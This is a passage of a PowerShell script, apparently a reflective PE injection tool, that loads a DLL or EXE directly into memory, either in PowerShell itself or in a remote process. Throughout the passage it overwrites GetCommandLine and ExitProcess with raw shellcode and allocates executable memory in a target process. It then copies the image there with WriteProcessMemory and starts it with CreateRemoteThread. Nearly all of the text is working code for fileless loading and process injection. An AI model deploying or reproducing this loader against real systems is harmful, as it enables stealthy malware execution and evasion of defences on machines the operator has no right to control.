[UInt32]$OldProtectFlag = 0 $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } $GetCommandLineAAddrTemp = $GetCommandLineAAddr Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false) $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null #Overwrite GetCommandLineW [UInt32]$OldProtectFlag = 0 $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } $GetCommandLineWAddrTemp = $GetCommandLineWAddr Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false) $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null ################################################# ################################################# #For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work. # I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln. # It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the # argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported. $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" ` , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll") foreach ($Dll in $DllList) { [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll) if ($DllHandle -ne [IntPtr]::Zero) { [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln") [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln") if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero) { "Error, couldn't find _wcmdln or _acmdln" } $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr]) $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr]) $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false) [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false) $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize) $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize) $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false) $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false) $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null } } ################################################# ################################################# #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits. $ReturnArray = @() $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process #CorExitProcess (compiled in to visual studio c++) [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll") if ($MscoreeHandle -eq [IntPtr]::Zero) { throw "mscoree handle null" } [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess") if ($CorExitProcessAddr -eq [IntPtr]::Zero) { Throw "CorExitProcess address not found" } $ExitFunctions += $CorExitProcessAddr #ExitProcess (what non-managed programs use) [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess") if ($ExitProcessAddr -eq [IntPtr]::Zero) { Throw "ExitProcess address not found" } $ExitFunctions += $ExitProcessAddr [UInt32]$OldProtectFlag = 0 foreach ($ProcExitFunctionAddr in $ExitFunctions) { $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr #The following is the shellcode (Shellcode: ExitThread.asm): #32bit shellcode [Byte[]]$Shellcode1 = @(0xbb) [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb) #64bit shellcode (Shellcode: ExitThread.asm) if ($PtrSize -eq 8) { [Byte[]]$Shellcode1 = @(0x48, 0xbb) [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb) } [Byte[]]$Shellcode3 = @(0xff, 0xd3) $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread") if ($ExitThreadAddr -eq [IntPtr]::Zero) { Throw "ExitThread address not found" } $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) if ($Success -eq $false) { Throw "Call to VirtualProtect failed" } #Make copy of original ExitProcess bytes $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize) #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then # call ExitThread Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false) $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false) $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null } ################################################# Write-Output $ReturnArray } #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count) # It copies Count bytes from Source to Destination. Function Copy-ArrayOfMemAddresses { Param( [Parameter(Position = 0, Mandatory = $true)] [Array[]] $CopyInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants ) [UInt32]$OldProtectFlag = 0 foreach ($Info in $CopyInfo) { $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) if ($Success -eq $false) { Throw "Call to VirtualProtect failed" } $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null } } ##################################### ########## FUNCTIONS ########### ##################################### Function Get-MemoryProcAddress { Param( [Parameter(Position = 0, Mandatory = $true)] [IntPtr] $PEHandle, [Parameter(Position = 1, Mandatory = $true)] [String] $FunctionName ) $Win32Types = Get-Win32Types $Win32Constants = Get-Win32Constants $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants #Get the export table if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0) { return [IntPtr]::Zero } $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress) $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY) for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++) { #AddressOfNames is an array of pointers to strings of the names of the functions exported $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32])) $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr) if ($Name -ceq $FunctionName) { #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions # which contains the offset of the function in to the DLL $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))) $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16]) $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32]) return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset) } } return [IntPtr]::Zero } Function Invoke-MemoryLoadLibrary { Param( [Parameter( Position = 0, Mandatory = $true )] [Byte[]] $PEBytes, [Parameter(Position = 1, Mandatory = $false)] [String] $ExeArgs, [Parameter(Position = 2, Mandatory = $false)] [IntPtr] $RemoteProcHandle ) $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) #Get Win32 constants and functions $Win32Constants = Get-Win32Constants $Win32Functions = Get-Win32Functions $Win32Types = Get-Win32Types $RemoteLoading = $false if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero)) { $RemoteLoading = $true } #Get basic PE information Write-Verbose "Getting basic PE information from the file" $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types $OriginalImageBase = $PEInfo.OriginalImageBase $NXCompatible = $true if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) { Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue $NXCompatible = $false } #Verify that the PE and the current process are the same bits (32bit or 64bit) $Process64Bit = $true if ($RemoteLoading -eq $true) { $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process") if ($Result -eq [IntPtr]::Zero) { Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit" } [Bool]$Wow64Process = $false $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process) if ($Success -eq $false) { Throw "Call to IsWow64Process failed" } if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4))) { $Process64Bit = $false } #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly $PowerShell64Bit = $true if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) { $PowerShell64Bit = $false } if ($PowerShell64Bit -ne $Process64Bit) { throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process" } } else { if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) { $Process64Bit = $false } } if ($Process64Bit -ne $PEInfo.PE64Bit) { Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)" } #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address Write-Verbose "Allocating memory for the PE and write its headers to memory" [IntPtr]$LoadAddr = [IntPtr]::Zero if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) { Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue [IntPtr]$LoadAddr = $OriginalImageBase } $PEHandle = [IntPtr]::Zero #This is where the PE is allocated in PowerShell $EffectivePEHandle = [IntPtr]::Zero #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process. if ($RemoteLoading -eq $true) { #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) #todo, error handling needs to delete this memory if an error happens along the way $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($EffectivePEHandle -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use" } } else { if ($NXCompatible -eq $true) { $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) } else { $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) } $EffectivePEHandle = $PEHandle } [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage) if ($PEHandle -eq [IntPtr]::Zero) { Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)." } [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null #Now that the PE is in memory, get more detailed information about it Write-Verbose "Getting detailed PE information from the headers loaded in memory" $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle Write-Verbose "StartAddress: $PEHandle EndAddress: $PEEndAddress" #Copy each section from the PE in to memory Write-Verbose "Copy PE sections in to memory" Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory" Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types #The PE we are in-memory loading has DLLs it needs, import those DLLs for it Write-Verbose "Import DLL's needed by the PE we are loading" if ($RemoteLoading -eq $true) { Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle } else { Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants } #Update the memory protection flags for all the memory just allocated if ($RemoteLoading -eq $false) { if ($NXCompatible -eq $true) { Write-Verbose "Update memory protection flags" Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types } else { Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute" } } else { Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions" } #If remote loading, copy the DLL in to remote process memory if ($RemoteLoading -eq $true) { [UInt32]$NumBytesWritten = 0 $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten) if ($Success -eq $false) { Throw "Unable to write shellcode to remote process memory." } } #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function if ($PEInfo.FileType -ieq "DLL") { if ($RemoteLoading -eq $false) { Write-Verbose "Calling dllmain so the DLL knows it has been loaded" $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null } else { $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) if ($PEInfo.PE64Bit -eq $true) { #Shellcode: CallDllMain.asm $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9) $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8) $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3) } else { #Shellcode: CallDllMain.asm $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9) $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8) $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3) } $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2) $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) $SCPSMemOriginal = $SCPSMem Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length) $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($RSCAddr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for shellcode" } $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) { Throw "Unable to write shellcode to remote process memory." } $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null } } elseif ($PEInfo.FileType -ieq "EXE") { #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1) [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00) $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread # This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread. [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) Write-Verbose "Call EXE Main function. Address: $ExeMainPtr. Creating thread for the EXE to run in." $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null while($true) { [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0) if ($ThreadDone -eq 1) { Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants Write-Verbose "EXE thread has completed." break } else { Start-Sleep -Seconds 1 } } } return @($PEInfo.PEHandle, $EffectivePEHandle) } Function Invoke-MemoryFreeLibrary { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $PEHandle ) #Get Win32 constants and functions $Win32Constants = Get-Win32Constants $Win32Functions = Get-Win32Functions $Win32Types = Get-Win32Types $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants #Call FreeLibrary for all the imports of the DLL if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) { [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) while ($true) { $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) #If the structure is null, it signals that this is the end of the array if ($ImportDescriptor.Characteristics -eq 0 ` -and $ImportDescriptor.FirstThunk -eq 0 ` -and $ImportDescriptor.ForwarderChain -eq 0 ` -and $ImportDescriptor.Name -eq 0 ` -and $ImportDescriptor.TimeDateStamp -eq 0) { Write-Verbose "Done unloading the libraries needed by the PE" break } $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))) $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath) if ($ImportDllHandle -eq $null) { Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue } $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle) if ($Success -eq $false) { Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue } $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) } } #Call DllMain with process detach Write-Verbose "Calling dllmain so the DLL knows it is being unloaded" $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) { Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue } } Function Main { $Win32Functions = Get-Win32Functions $Win32Types = Get-Win32Types $Win32Constants = Get-Win32Constants $RemoteProcHandle = [IntPtr]::Zero #If a remote process to inject in to is specified, get a handle to it if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne "")) { Throw "Can't supply a ProcId and ProcName, choose one or the other" } elseif ($ProcName -ne $null -and $ProcName -ne "") { $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue) if ($Processes.Count -eq 0) { Throw "Can't find process $ProcName" } elseif ($Processes.Count -gt 1) { $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId Write-Output $ProcInfo Throw "More than one instance of $ProcName found, please specify the process ID to inject in to." } else { $ProcId = $Processes[0].ID } } #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future. #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege # if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId) # { # Write-Verbose "Getting SeDebugPrivilege" # Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants # } if (($ProcId -ne $null) -and ($ProcId -ne 0)) { $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId) if ($RemoteProcHandle -eq [IntPtr]::Zero) { Throw "Couldn't obtain the handle for process ID: $ProcId" } Write-Verbose "Got the handle for the remote process to inject in to" } #Load the PE reflectively Write-Verbose "Calling Invoke-MemoryLoadLibrary" if (((Get-WmiObject -Class Win32_Processor).AddressWidth / 8) -ne [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) { Write-Error "PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS." 